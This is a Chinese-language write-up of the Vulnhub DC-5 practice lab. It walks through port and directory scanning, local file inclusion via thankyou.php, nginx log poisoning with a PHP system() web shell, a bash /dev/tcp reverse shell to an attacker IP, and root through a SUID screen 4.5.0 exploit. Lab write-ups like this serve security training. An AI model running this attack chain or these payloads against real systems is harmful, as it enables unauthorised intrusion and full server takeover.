Vulnhub DC_5

前言

Vulnhub DC5

https://www.vulnhub.com/entry/dc-5,314/

靶机IP

192.168.1.5

信息收集

nmap -p- --min-rate 10000 192.168.1.7 -oN nmap/port.txt 

PORT      STATE SERVICE                                                   
80/tcp    open  http                                                     
111/tcp   open  rpcbind                                                   
45665/tcp open  unknown

nmap -sT -sC -sV -O -p80,111,45665 192.168.1.7 -oN nmap/detail.txt

STATE SERVICE VERSION

80/tcp    open  http    nginx 1.6.2
|_http-title: Welcome
|_http-server-header: nginx/1.6.2
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          44972/udp   status
|   100024  1          45665/tcp   status
|   100024  1          45705/udp6  status
|_  100024  1          50069/tcp6  status
45665/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:99:6F:74 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop

• 操作系统：Linux 3.2 - 4.14

• 开放端口：80，111，45665

• nginx 1.6.2

gobuster dir -u http://192.168.1.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
dirsearch -u http://192.168.1.7 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt

(Status: 200) [Size: 4025]

images               (Status: 301) [Size: 184] [--> http://192.168.1.7/images/]
contact.php          (Status: 200) [Size: 4282]
faq.php              (Status: 200) [Size: 5645]
solutions.php        (Status: 200) [Size: 4100]
footer.php           (Status: 200) [Size: 17]
css                  (Status: 301) [Size: 184] [--> http://192.168.1.7/css/]
about-us.php         (Status: 200) [Size: 4292]
thankyou.php         (Status: 200) [Size: 852]

LFI

找了wp才知道存在文件包含

http://192.168.1.7/contact.php

提交表单后跳转到/thankyou.php

刷新下方的脚表会一直变化

根据目录扫描结果，存在单独的footer.php ，也有同样效果，而其他页面的脚标不会变化，只有/thankyou.php，可以推断/thankyou.php页面包含了footer.php

fuzz

ffuf -u "http://192.168.1.7/thankyou.php?FUZZ=./thankyou.php" -w fuzz_params.txt 

得到参数file

http://192.168.1.7/thankyou.php?file=/etc/passwd

得到passwd

根据nmap结果，nginx 1.6.2寻找日志文件

/var/log/nginx/error.log

写入日志

curl http://192.168.1.7/ -H "User-Agent: <?php system($_POST['cmd']); phpinfo();?>"

蚁剑连接

反弹shell

/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.17/6666 0>&1'

suid screen提权

寻找suid

find / -perm -4000 2>/dev/null

发现存在/bin/screen-4.5.0

searchsploit screen 4.5.0

存在脚本，下载并上传靶机

执行

在root目录得到flag

888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 
                                                                                          
                                                                                          


Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.